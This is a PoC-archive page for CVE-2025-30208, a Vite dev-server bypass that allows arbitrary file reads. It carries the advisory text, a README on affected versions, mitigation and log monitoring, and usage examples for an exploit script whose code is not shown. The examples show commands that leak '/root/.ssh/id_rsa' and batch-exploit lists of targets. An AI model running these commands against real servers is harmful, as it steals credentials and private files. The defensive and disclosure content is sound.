Associated Vulnerability
Title:Vite bypasses server.fs.deny when using `?raw??` (CVE-2025-30208)Description:Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Description
CVE-2025-30208
Readme
# CVE-2025-30208 Vite Arbitrary File Read vulnerability 🌌
Here's a detailed overview of **CVE‑2025‑30208**, a medium-severity arbitrary file‑read vulnerability in Vite’s dev server:
---
## 🛠️ What is it?
* Vite’s `@fs` module allows static file access in development mode with path allowances controlled by `server.fs.allow`.
* Versions **before** 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 contain a flaw: URLs crafted with trailing query markers like `?raw??` or `?import&raw??` can bypass access restrictions and expose arbitrary files (e.g., system or source files) ([nvd.nist.gov][1]).
---
## 🔍 Who's affected?
* Vite dev‑servers explicitly **exposed to the network**, enabled via `--host` or `server.host`.
* Vulnerable version ranges:
* 4.5.0 – 4.5.9
* 5.0.0 – 5.4.14
* 6.0.0 – 6.2.2 (with sub-versions as detailed) ([nsfocusglobal.com][2]).
---
## ⚠️ Severity & Impact
* **CVSS 3.1 score: 5.3 (Medium 🟠)**: Network attack, no privileges, high confidentiality impact ([wiz.io][3]).
* Exploitability: straightforward via crafted HTTP requests out of development servers ([wiz.io][3]).
* Public PoC is available, including scripts demonstrating `/etc/passwd` leaks ([github.com][4]).
---
## 🛡️ Mitigation & Response
* **Upgrade Vite** to one of the patched versions:
* **6.2.3**, **6.1.2**, **6.0.12**, **5.4.15**, or **4.5.10** ([nvd.nist.gov][1]).
* **Avoid exposing** dev servers to public networks; limit with `localhost` or firewall rules ([wiz.io][3]).
* Additional scanning tools (e.g., NSFocus EZ, Sangfor, Tenable) support detection ([nsfocusglobal.com][2]).
---
## ✅ Summary Table
```
| Aspect | Details |
| ------------------ | ---------------------------------------------------------- |
| **Flaw** | `@fs` path filter bypass via malformed query strings |
| **Versions** | <4.5.10, <5.4.15, <6.0.12, <6.1.2, <6.2.3 |
| **Severity** | Medium (CVSS 5.3), network exploit, confidentiality impact |
| **Exploitability** | Easy; PoC exists |
| **Patched in** | Vite 4.5.10, 5.4.15, 6.0.12, 6.1.2, 6.2.3 |
| **Mitigation** | Upgrade + avoid exposing dev server |
```
---
## 🔗 References & Sources
* NVD / GitHub Advisory (Mar 24 2025) ([nvd.nist.gov][1], [wiz.io][3], [security.snyk.io][5], [recordedfuture.com][6])
* Technical writeups: NSFocus, Sangfor, Snyk, Recorded Future 
---
## ✅ Recommended Next Steps
1. **Audit your Vite versions** in development environments, especially any exposed externally.
2. **Upgrade** immediately to a fixed version.
3. **Restrict access** to development servers—bind to `localhost`, use VPNs or firewalls.
4. **Run security scans/tools** to detect CVE‑2025‑30208 in your infrastructure.
5. **Monitor your logs** for suspicious `/@fs/...?...?` requests.
Let me know if you'd like help implementing fixes, crafting firewall rules, or assessing exposure!
[1]: https://nvd.nist.gov/vuln/detail/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Detail - NVD"
[2]: https://nsfocusglobal.com/vite-arbitrary-file-read-vulnerability-cve-2025-30208/?utm_source=chatgpt.com "Vite Arbitrary File Read vulnerability (CVE-2025-30208) - NSFocus"
[3]: https://www.wiz.io/vulnerability-database/cve/cve-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Impact, Exploitability, and Mitigation Steps | Wiz"
[4]: https://security.snyk.io/vuln/SNYK-JS-VITE-9512410?utm_source=chatgpt.com "Incorrect Authorization in vite | CVE-2025-30208 | Snyk"
[5]: https://www.recordedfuture.com/vulnerability-database/CVE-2025-30208?utm_source=chatgpt.com "CVE-2025-30208 Description, Impact and Technical Details"
## Examples:
1- Single target exploitation:
```
python3 cve-2025-30208.py -u example.com:5173
```
2- Single target with custom LFI path to leak the file we want:
```
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'
```
3- Batch exploitation with multiple targets:
```
python3 cve-2025-30208.py -f targets.txt
```
4- Custom bypass query:
```
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"
```
5- Using a proxy (e.g. Burp Suite):
```
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080
```
6- Custom output directory:
```
python3 cve-2025-30208.py -u example.com:5173 -o ./loot
```
7- Increase thread count in batch mode:
```
python3 cve-2025-30208.py -f targets.txt -t 50
```
## ⚠️ Disclaimer
This project is created for **educational and research purposes only**. The author is not responsible for any misuse of this tool or information provided herein.
Using this software against systems without explicit permission is **illegal** and strictly prohibited. Always ensure you have **written authorization** before performing any security testing.
By using this repository, you agree to comply with all applicable local, state, national, and international laws.
File Snapshot
[4.0K] /data/pocs/3a1071264f0ede1cfce156b2f5fac94908a40ec2
├── [5.1K] CVE-2025-30208.py
└── [4.9K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →